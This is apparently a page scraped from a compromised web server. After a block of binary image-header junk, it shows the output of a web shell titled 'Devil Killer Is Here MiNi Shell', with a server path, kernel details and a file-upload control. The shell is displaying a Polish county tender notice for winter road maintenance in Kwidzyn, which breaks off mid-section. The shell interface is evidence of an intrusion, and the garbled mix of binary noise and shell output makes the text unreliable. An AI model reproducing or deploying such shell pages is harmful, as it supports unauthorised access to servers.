JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211026/0024543201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zamówienie klasyczne prowadzone w trybie podstawowym- wariant I (bez negocjacji) pn. Zimowe utrzymanie dróg powiatowych na terenie<br/>powiatu w sezonie zimowym 2021/2022. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kwidzyński- Starostwo Powiatowe w Kwidzynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192644760</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 29B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kwidzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatkwidzynski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.powiatkwidzynski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zamówienie klasyczne prowadzone w trybie podstawowym- wariant I (bez negocjacji) pn. Zimowe utrzymanie dróg powiatowych na terenie<br/>powiatu w sezonie zimowym 2021/2022. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-def58843-361c-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00245432</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000767/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.1 Zimowe utrzymanie dróg powiatowych na ternie powiatu 2021/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl; www.bip.powiatkwidzynski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Obsługa komunikacji w<br/>formieelektronicznej pomiędzy Zamawiającym a Wykonawcami oraz składanie ofert odbywa się przy użyciu:-https://miniportal.uzp.gov.pl - https://epuap.gov.pl/wps/portal;_oraz_poczty_elektronicznejz_zastrzezeniem_ze_zlozenie_oferty_nastepuje_wylacznie_przy_uzyciu_miniPortalu,_ePUAPu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Informacje ogólne 1.1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. 1.2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>1.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: &#34;Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i<br/>&#34;Formularz do komunikacji&#34; wynosi 150 MB.<br/>1.4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>1.5. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik nr 8 do niniejszej SWZ. Dane postępowanie można wyszukać<br/>również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję &#34;Dla Wykonawców&#34; lub ze strony głównej z zakładki Postępowania.<br/>2. Złożenie oferty.<br/>2.1. Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego<br/>również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach<br/>danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja<br/>związana z postępowaniem.<br/>2.2. Ofertę należy sporządzić w języku polskim.<br/>2.3. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>2.4. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w &#34;Instrukcji użytkownika&#34;,dostępnej na stronie: https://miniportal.uzp.gov.pl/<br/>2.5. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 r. a zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje<br/>je w wydzielonym i odpowiednio oznaczonym pliku,<br/>wraz z jednoczesnym zaznaczeniem polecenia &#34;Załącznik stanowiący tajemnicę przedsiębiorstwa&#34; a następnie wraz z plikami stanowiącymi jawną część<br/>należy ten plik zaszyfrować.<br/>2.6. Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie<br/>wskazanym w załączniku nr 5 do SWZ, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.<br/>2.7. Oferta może być złożona tylko do upływu terminu składania ofert.<br/>2.8. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób wycofania oferty został opisany w „Instrukcji użytkownika&#34; dostępnej na<br/>miniPortalu<br/>2.9. Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>3. Pozostałe informacje, w tym dotyczące sposobu komunikowania się zamawiającego z wykonawcami<br/>(niedotyczący składania ofert) znajdują się w rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z<br/>dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1)administratorem Pani/Pana danych osobowych jestStarosta Powiatu Kwidzyńskiego z<br/>siedzibą w Starostwie Powiatowym w Kwidzynie o następującychdanych kontaktowych: 82-500 Kwidzyn, ul. Kościuszki 29b,<br/>email:IOD@powiatkwidzynski.pl.2)administrator wyznaczył Inspektora Danych Osobowych, z którym możnasię kontaktować pod adresem e-mail:<br/>IOD@powiatkwidzynski.pl.3)Pani/Pana dane<br/>osoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowympostępowaniem o udzielenie zamówienia<br/>klasycznego, prowadzonym w trybie<br/>podstawowym pn. Zimowe utrzymanie dróg powiatowych na terenie powiatu w sezonie zimowym 2021/2022 o wartości mniejszej niżprogi unijne, nr<br/>sprawy: ORIV.272.11.20214)odbiorcami Pani/Pana<br/>danych osobowych będą osoby lubpodmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawyP.Z.P.5)Pani/Pana<br/>dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowyprzekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;6)obowiązek podaniaprzez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiemustawowym określonym<br/>w<br/>przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu oudzielenie zamówienia publicznego.7)w odniesieniu do Pani/Pana danych<br/>osobowych decyzje nie będąpodejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8)posiada Pani/Pan:a)napodstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących (stosownie dobrzmienia przepisu<br/>art. 75 ustawy pzp- w przypadku korzystania przez osobę, której dane osobowe sąprzetwarzane przez zamawiającego, z uprawnienia, o którym mowa w<br/>art. 15 ust. 1-3 RODO,zamawiający może żądać od<br/>osoby występującej z żądaniem wskazania dodatkowych informacji,mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzieleniezamówienia);b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(stosownie do brzmienia przepisu art. 76<br/>ustawy<br/>pzp- skorzystanie przez osobę, której dane osobowesą przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o których<br/>mowaw art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników);c)na podstawie art.18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu<br/>orazprzypadków, o których mowa w art. 18 ust. 2<br/>RODO;d)prawo do wniesienia skargi do Prezesa UrzęduOchrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Panadotyczących narusza przepisy RODO; 9)nie<br/>przysługuje Pani/Panu:a)w związku z art. 17 ust. 3 lit. b, dlub e RODO prawo do usunięcia danych osobowych;b)prawo do przenoszenia danych<br/>osobowych, októrym mowa w art. 20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzaniadanych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.1 lit. c RODO; 10)przysługuje Pani/Panu prawo wniesienia skargi do organu<br/>nadzorczego naniezgodne z RODO przetwarzanie<br/>Pani/Pana danych osobowych przez administratora. Organemwłaściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2,<br/>00-193Warszawa.11)Stosownie do brzmienia przepisu art. 19 ust. 5 ustawy pzp- Zamawiający przetwarzadane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantującyzabezpieczenie przed ich bezprawnym rozpowszechnianiem.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W nawiązaniu do powyższego obowiązku informacyjnego,a<br/>także rozdziału XXXVIII SWZ:- na podstawie art. 16 RODO prawo do sprostowania Pani/Panadanych osobowych (stosownie do brzmienia przepisu art.<br/>19 ust. 2 ustawy pzp- skorzystanie przezosobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowaw art.<br/>16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia anizmianą postanowień umowy w sprawie zamówienia publicznego<br/>w zakresie niezgodnym z ustawąPZP/<br/>stosownie do brzmienia przepisu art. 76 ustawy pzp- skorzystanie przez osobę, której daneosobowe są przetwarzane, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, októrych mowa w art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników);- napodstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danychosobowych z zastrzeżeniem okresu trwania postępowania o udzielenie<br/>zamówienia publicznego lubkonkursu oraz<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (stosownie do brzmienia przepisuart. 19 ust. 3 ustawy pzp- w postępowaniu o udzielenie zamówienia<br/>zgłoszenie żądania ograniczeniaprzetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowychdo czasu<br/>zakończenia tego postępowania nie ma zastosowania w odniesieniu do przechowywania, wcelu zapewnienia korzystania ze środków ochrony prawnej lub<br/>w celu ochrony praw innej osobyfizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lubpaństwa członkowskiego).<br/>Informacja obejmująca powyższy obowiązek informacyjny, a takżeprzedmiotowe<br/>ograniczenia stosowania znajduje się również w rozdziale XXXVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ORIV.272.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest wykonanie usług polegających na kompleksowym zimowym utrzymaniu dróg powiatowych na obszarze powiatu<br/>kwidzyńskiego w sezonie zimowym 2021/2022 w rejonie nr 2.<br/>Zadanie obejmuje działania prewencyjne, likwidację śliskości i odśnieżanie, przy użyciu własnych materiałów oraz własnego sprzętu i transportu<br/>a w szczególności:<br/>1) mechaniczne odśnieżanie patrolowo- interwencyjne dróg jednojezdniowych na pełnej<br/>szerokości dwóch pasów ruchu pługiem (100% długości dróg objętych ZUD),<br/>2) mechaniczne odśnieżanie dróg powiatowych nieutwardzonych (wg wykazu) na pełnej<br/>szerokości pługiem,<br/>3) likwidacja śliskości dróg jednojezdniowych na pełnej szerokości dwóch pasów ruchu, poprzez<br/>uszorstnianie mieszanką 30% soli z piaskiem w ilości 120g/m² (przejazd 100% długości dróg<br/>objętych, uszorstnianie mieszanką 100% długości dróg objętych ZUD),<br/>4) odśnieżanie z jednoczesną likwidacją śliskości metodą jak wyżej dróg jednojezdniowych na<br/>pełnej szerokości dwóch pasów ruchu dróg objętych ZUD i likwidacja śliskości na 100% długości dróg objętych ZUD mieszanką 30% soli z<br/>piaskiem w ilości minimum 120g/m²),<br/>5) usuwanie zatorów śnieżnych przy użyciu pługa wirnikowego lub innego sprzętu technicznego umożliwiającego usuwanie zatorów śnieżnych o<br/>wydajności nie mniejszej jak pług wirnikowy,<br/>6) likwidacja śliskości dróg jednojezdniowych na pełnej szerokości dwóch pasów ruchu, poprzez uszorstnianie mieszanką w ilości 120 g/ m2<br/>(przejazd 100% długości dróg objętych, uszorstnianie mieszanką 30% soli z piaskiem na zakrętach, wzniesieniach, spadkach, łukach,<br/>skrzyżowaniach tj. 50% długości dróg objętych ZUD),<br/>7) gotowość do świadczenia usług, polegająca na zapewnieniu dyspozycyjności sprzętu i pracowników odpowiedzialnych za należyte wykonanie<br/>usług.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ- szczegółowe zasady i warunki realizacji usług w ramach Zimowego<br/>Utrzymania Dróg Powiatowych (ZUD) na obszarze powiatu kwidzyńskiego.<br/>2.Nazwy i kody Wspólnego Słownik Zamówień (CPV):<br/>90620000-9 – usługi odśnieżania<br/>90630000-2 – usługi usuwania oblodzeń<br/>3.Zamawiający dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów równoważnych co do jakości i surowców użytych do<br/>ich wykonania do materiałów i urządzeń podanych w dokumentach zamówienia (SWZ wraz z załącznikami).<br/>4.Jeśli w dokumentach zamówienia (SWZ wraz z załącznikami) wskazana jest nazwa handlowa firmy, towaru lub produktu, Zamawiający - w<br/>odniesieniu do wskazanych wprost w dokumentacji przetargowej parametrów, czy danych (technicznych lub jakichkolwiek innych),<br/>identyfikujących pośrednio lub bezpośrednio towar bądź produkt - dopuszcza rozwiązania równoważne zgodne z danymi technicznymi i parametrami zawartymi w w/w dokumentacji. Jako rozwiązania równoważne, należy rozumieć rozwiązania charakteryzujące się parametrami nie gorszymi od<br/>wymaganych, a znajdujących się w dokumentacji.<br/>5.Gdziekolwiek w dokumentach zamówienia (SWZ wraz z załącznikami) występują odniesienia do Polskich Norm, dopuszczalne jest stosowanie<br/>odpowiednich norm krajów Unii Europejskiej, w zakresie przyjętym przez polskie prawodawstwo.<br/>6.Wszędzie tam, gdzie dokumentach zamówienia (SWZ wraz z załącznikami), przy opisie zastosowanych materiałów lub urządzeń wskazano<br/>znaki towarowe, patenty lub pochodzenie przyjmuje się, że mogą być zastosowane materiały lub urządzenia równoważne. Wskazanie znaku<br/>towarowego, patentu lub pochodzenia ma charakter jedynie przykładowy i użyty jest w celu określenia standardów jakościowych i klasy, wymaganych w odniesieniu do stosowanych materiałów lub urządzeń. W przypadku, gdy<br/>powoływane normy i przepisy są państwowe lub odnoszą się do konkretnego kraju lub regionu, mogą być również stosowane inne odpowiednie normy zapewniające równy lub wyższy poziom wykonania niż powołane normy lub przepisy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">152 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu wykonania akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest wykonanie usług polegających na kompleksowym zimowym<br/>utrzymaniu dróg powiatowych na obszarze powiatu kwidzyńskiego w sezonie zimowym<br/>2021/2022 w rejonie nr 3.<br/>Zadanie obejmuje działania prewencyjne, likwidację śliskości i odśnieżanie, przy użyciu własnych materiałów oraz własnego sprzętu i transportu<br/>a w szczególności:<br/>1) mechaniczne odśnieżanie patrolowo- interwencyjne dróg jednojezdniowych na pełnej szerokości dwóch pasów ruchu pługiem (100% długości<br/>dróg objętych ZUD),<br/>2) mechaniczne odśnieżanie dróg powiatowych nieutwardzonych (wg wykazu) na pełnej szerokości pługiem,<br/>3) likwidacja śliskości dróg jednojezdniowych na pełnej szerokości dwóch pasów ruchu, poprzez uszorstnianie mieszanką 30% soli z piaskiem w<br/>ilości 120g/m² (przejazd 100% długości dróg objętych, uszorstnianie mieszanką 100% długości dróg objętych ZUD),<br/>4) odśnieżanie z jednoczesną likwidacją śliskości metodą jak wyżej dróg jednojezdniowych na pełnej szerokości dwóch pasów ruchu dróg<br/>objętych ZUD i likwidacja 